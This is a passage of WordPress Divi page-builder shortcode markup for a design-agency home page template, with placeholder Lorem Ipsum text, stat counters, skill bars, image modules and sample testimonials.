animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many 